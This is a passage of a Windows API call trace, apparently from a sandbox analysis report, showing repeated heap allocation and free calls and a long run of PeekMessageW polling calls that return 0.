(HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0129.622] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0129.622] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0129.622] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0129.622] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0129.622] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0129.622] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0129.622] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.622] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0129.622] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.622] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0129.622] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0129.622] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0129.622] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0129.622] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0129.622] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0129.622] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0129.622] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.622] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0129.622] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.622] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0129.622] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0129.623] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0129.623] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0129.623] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0129.623] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0129.623] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0129.623] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.623] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0129.623] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.623] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0129.623] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0129.623] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0129.623] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0129.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0129.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0129.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0129.624] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0129.624] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0129.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0129.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0129.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0129.624] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.624] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.708] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.708] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.708] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.708] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.708] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.708] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.708] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.708] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.708] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.708] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.709] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.710] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.710] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.710] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.710] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.710] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.710] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.710] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.710] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.710] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.710] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.710] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.710] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.710] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.711] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.711] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.711] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.711] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.711] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.711] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.711] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.711] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.711] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.711] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.711] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.711] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.711] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.711] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.711] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.711] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.711] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 